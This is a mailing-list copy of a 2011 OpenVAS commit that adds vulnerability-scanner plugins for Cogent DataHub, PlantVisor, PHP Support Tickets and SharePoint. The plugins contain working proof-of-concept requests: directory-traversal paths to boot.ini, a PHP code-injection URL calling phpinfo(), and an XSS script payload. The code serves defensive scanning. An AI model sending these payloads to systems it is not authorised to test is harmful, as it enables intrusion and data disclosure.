[Openvas-commits] r11612 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Wed Sep 14 13:32:01 CEST 2011


Author: mime
Date: 2011-09-14 13:31:57 +0200 (Wed, 14 Sep 2011)
New Revision: 11612

Added:
   trunk/openvas-plugins/scripts/gb_cogent_datahub_49610.nasl
   trunk/openvas-plugins/scripts/gb_php_support_tickets_49567.nasl
   trunk/openvas-plugins/scripts/gb_php_support_tickets_detect.nasl
   trunk/openvas-plugins/scripts/gb_plantvisor_49601.nasl
   trunk/openvas-plugins/scripts/gb_sharepoint_39776.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-09-13 13:52:18 UTC (rev 11611)
+++ trunk/openvas-plugins/ChangeLog	2011-09-14 11:31:57 UTC (rev 11612)
@@ -1,3 +1,12 @@
+2011-09-14  Michael Meyer <michael.meyer at greenbone.net>
+
+	* * scripts/gb_sharepoint_39776.nasl,
+	scripts/gb_plantvisor_49601.nasl,
+	scripts/gb_cogent_datahub_49610.nasl,
+	scripts/gb_php_support_tickets_detect.nasl,
+	scripts/gb_php_support_tickets_49567.nasl:
+	Added new plugins.
+
 2011-09-13  Michael Meyer <michael.meyer at greenbone.net>
 
 	* scripts/ovcesa2009_1096.nasl,

Added: trunk/openvas-plugins/scripts/gb_cogent_datahub_49610.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cogent_datahub_49610.nasl	2011-09-13 13:52:18 UTC (rev 11611)
+++ trunk/openvas-plugins/scripts/gb_cogent_datahub_49610.nasl	2011-09-14 11:31:57 UTC (rev 11612)
@@ -0,0 +1,79 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Cogent DataHub Directory Traversal Vulnerability and Information Disclosure Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103253);
+ script_bugtraq_id(49610,49611);
+ script_version ("1.0-$Revision$");
+
+ script_name("Cogent DataHub Multiple Vulnerabilities");
+
+desc = "Overview:
+Cogent DataHub is prone to a directory-traversal vulnerability, an
+information-disclosure vulnerability and to multiple buffer-overflow
+and integer-overflow vulnerabilities.
+
+Exploiting the issues may allow an attacker to obtain sensitive
+information that could aid in further attacks or may allow attackers
+to execute arbitrary code within the context of the privileged domain.
+
+Cogent DataHub 7.1.1.63 is vulnerable; other versions may also
+be affected.
+
+References:
+http://www.securityfocus.com/bid/49610
+http://www.cogentdatahub.com/Products/Cogent_DataHub.html
+http://aluigi.org/mytoolz/mydown.zip";
+
+ script_tag(name:"risk_factor", value:"Critical");
+ script_description(desc);
+ script_summary("Determine if Cogent DataHub is prone to a directory-traversal vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+url = string(dir, "/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini"); 
+
+if(http_vuln_check(port:port, url:url,pattern:"\[boot loader\]")) {
+     
+  security_hole(port:port);
+  exit(0);
+
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_cogent_datahub_49610.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_php_support_tickets_49567.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_php_support_tickets_49567.nasl	2011-09-13 13:52:18 UTC (rev 11611)
+++ trunk/openvas-plugins/scripts/gb_php_support_tickets_49567.nasl	2011-09-14 11:31:57 UTC (rev 11612)
@@ -0,0 +1,112 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PHP Support Tickets 'page' Parameter Remote PHP Code Execution Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103256);
+ script_bugtraq_id(49567);
+ script_version ("1.0-$Revision$");
+
+ script_name("PHP Support Tickets 'page' Parameter Remote PHP Code Execution Vulnerability");
+
+desc = "Overview:
+PHP Support Tickets is prone to a vulnerability that lets remote
+attackers execute arbitrary code because the application fails to
+sanitize user-supplied input.
+
+Attackers can exploit this issue to execute arbitrary PHP code within
+the context of the affected webserver process.
+
+PHP Support Tickets 2.2 is vulnerable; other versions may also
+be affected.
+
+References:
+http://www.securityfocus.com/bid/49567
+http://www.phpsupporttickets.com/index.php";
+
+ script_tag(name:"risk_factor", value:"High");
+ script_description(desc);
+ script_summary("Determine if installed PHP Support Tickets is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("gb_php_support_tickets_detect.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+if(!dir = get_dir_from_kb(port:port,app:"php_support_tickets"))exit(0);;
+
+url = string(dir, "/index.php");
+req = http_get(item:url, port:port);
+buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+if( buf == NULL ) exit(0);
+
+session_id = eregmatch(pattern:"Set-Cookie: PHPSESSID=([^;]+)",string:buf);
+if(isnull(session_id[1]))exit(0);
+sess = session_id[1];
+
+url = string(dir, "/index.php?page=xek()%3Bfunction+PHPST_PAGENAME_XEK(){phpinfo()%3B}"); 
+
+soc = open_sock_tcp(port);
+if(!soc)exit(0);
+
+host = get_host_name();
+
+req = string("GET /index.php?page=xek()%3Bfunction+PHPST_PAGENAME_XEK(){phpinfo()%3B} HTTP/1.1\r\n",
+	     "Host: ",host,"\r\n",
+	     "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:6.0) Gecko/20100101 Firefox/6.0\r\n",
+	     "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n",
+	     "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n",
+	     "Accept-Encoding: gzip, deflate\r\n",
+	     "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n",
+	     "DNT: 1\r\n",
+	     "Connection: keep-alive\r\n",
+	     "Cookie: PHPSESSID=",sess,"\r\n",
+	     "\r\n");
+send(socket:soc, data:req);
+buf = recv(socket:soc, length:16384);
+close(soc);
+
+if("<title>phpinfo()" >< buf && "php.ini" >< buf && "PHP API" >< buf) {
+
+  security_hole(port:port);
+  exit(0);
+
+}  
+     
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_php_support_tickets_49567.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_php_support_tickets_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_php_support_tickets_detect.nasl	2011-09-13 13:52:18 UTC (rev 11611)
+++ trunk/openvas-plugins/scripts/gb_php_support_tickets_detect.nasl	2011-09-14 11:31:57 UTC (rev 11612)
@@ -0,0 +1,117 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PHP Support Tickets Detection
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+# need desc here to modify it later in script.
+desc = "Overview:
+This host is running PHP Support Tickets, a a PHP5 / MySQL helpdesk
+system.
+
+See also:
+http://www.phpsupporttickets.com/";
+
+if (description)
+{
+ 
+ script_tag(name:"risk_factor", value:"None");
+ script_id(103255);
+ script_version ("1.0-$Revision$");
+
+ script_name("PHP Support Tickets Detection");
+ script_description(desc);
+ script_summary("Checks for the presence of PHP Support Tickets");
+ script_category(ACT_GATHER_INFO);
+ script_family("Service detection");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/tickets","/support",cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/index.php");
+ req = http_get(item:url, port:port);
+
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if(egrep(pattern: "<title>PHP Support Tickets", string: buf, icase: TRUE))
+ {
+     if(strlen(dir)>0) {
+        install=dir;
+     } else {
+        install=string("/");
+     }
+
+    vers = string("unknown");
+    ### try to get version 
+    version = eregmatch(string: buf, pattern: "PHP Support Tickets v([0-9.]+)",icase:TRUE);
+
+    if ( !isnull(version[1]) ) {
+       vers=chomp(version[1]);
+    }
+
+    set_kb_item(name: string("www/", port, "/php_support_tickets"), value: string(vers," under ",install));
+
+    if(vers == "unknown") {
+      set_kb_item(name:string("cpe:/a:triangle_solutions:php_support_tickets"), value:TRUE);
+    }  else {
+      set_kb_item(name:string("cpe:/a:triangle_solutions:php_support_tickets:",vers), value:TRUE);
+    }  
+
+    info = string("com/\n\nPHP Support Tickets Version '");
+    info += string(vers);
+    info += string("' was detected on the remote host in the following directory(s):\n\n");
+    info += string(install, "\n");
+
+    desc = ereg_replace(
+        string:desc,
+        pattern:"com/$",
+        replace:info
+    );
+
+       if(report_verbosity > 0) {
+         security_note(port:port,data:desc);
+       }
+       exit(0);
+
+ }
+}
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_php_support_tickets_detect.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_plantvisor_49601.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_plantvisor_49601.nasl	2011-09-13 13:52:18 UTC (rev 11611)
+++ trunk/openvas-plugins/scripts/gb_plantvisor_49601.nasl	2011-09-14 11:31:57 UTC (rev 11612)
@@ -0,0 +1,82 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PlantVisor Enhanced Unspecified Directory Traversal Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103252);
+ script_bugtraq_id(49601);
+ script_version ("1.0-$Revision$");
+
+ script_name("PlantVisor Enhanced Unspecified Directory Traversal Vulnerability");
+
+desc = "Overview:
+PlantVisor Enhanced is prone to a directory-traversal vulnerability
+because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue will allow an attacker to view arbitrary files
+within the context of the webserver. Information harvested may aid in
+launching further attacks.
+
+PlantVisor Enhanced 2.4.4 is vulnerable; other versions may also
+be affected.
+
+References:
+http://www.securityfocus.com/bid/49601
+http://www.carel.com/carelcom/web/eng/catalogo/prodotto_dett.jsp?id_prodotto=91
+http://aluigi.altervista.org/adv/plantvisor_1-adv.txt";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if PlantVisor is prone to a directory-traversal vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+banner = get_http_banner(port:port);
+if( ! banner || "Server: CarelDataServer" >!< banner )exit(0);
+
+   
+url = string(dir, "/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini"); 
+
+if(http_vuln_check(port:port, url:url,pattern:"\[boot loader\]")) {
+     
+  security_warning(port:port);
+  exit(0);
+
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_plantvisor_49601.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_sharepoint_39776.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_sharepoint_39776.nasl	2011-09-13 13:52:18 UTC (rev 11611)
+++ trunk/openvas-plugins/scripts/gb_sharepoint_39776.nasl	2011-09-14 11:31:57 UTC (rev 11612)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Microsoft SharePoint Server 2007 '_layouts/help.aspx' Cross Site Scripting Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103254);
+ script_bugtraq_id(39776);
+ script_cve_id("CVE-2010-0817");
+ script_version ("1.0-$Revision$");
+
+ script_name("Microsoft SharePoint Server 2007 '_layouts/help.aspx' Cross Site Scripting Vulnerability");
+
+desc = "Overview:
+Microsoft SharePoint Server 2007 and SharePoint Services 3.0 are prone
+to a cross-site scripting vulnerability because they fail to properly
+sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code
+in the browser of an unsuspecting user in the context of the affected
+site. This may allow the attacker to steal cookie-based authentication
+credentials and to launch other attacks.
+
+Solution:
+The vendor has released an advisory and updates. Please see the
+references for details.
+
+References:
+http://www.securityfocus.com/bid/39776
+http://blogs.technet.com/msrc/archive/2010/04/29/security-advisory-983438-released.aspx
+http://office.microsoft.com/en-us/sharepointserver/FX100492001033.aspx
+http://www.htbridge.ch/advisory/xss_in_microsoft_sharepoint_server_2007.html
+http://www.securityfocus.com/archive/1/511021
+http://support.avaya.com/css/P8/documents/100089744
+http://www.microsoft.com/technet/security/advisory/983438.mspx
+http://www.microsoft.com/technet/security/Bulletin/MS10-039.mspx";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if Microsoft SharePoint is prone to a cross-site scripting vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0); 
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_asp(port:port))exit(0);
+
+banner = get_http_banner(port:port);
+if(!banner || "sharepoint" >!< tolower(banner))exit(0);
+
+url = string(dir,"/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27OpenVAS-XSS-Test%27%29%3C/script%3E&tid=X"); 
+
+if(http_vuln_check(port:port, url:url,pattern:"<script>alert\('OpenVAS-XSS-Test'\)</script><br/>",check_header:TRUE)) {
+     
+  security_warning(port:port);
+  exit(0);
+
+}
+
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_sharepoint_39776.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision



More information about the Openvas-commits mailing list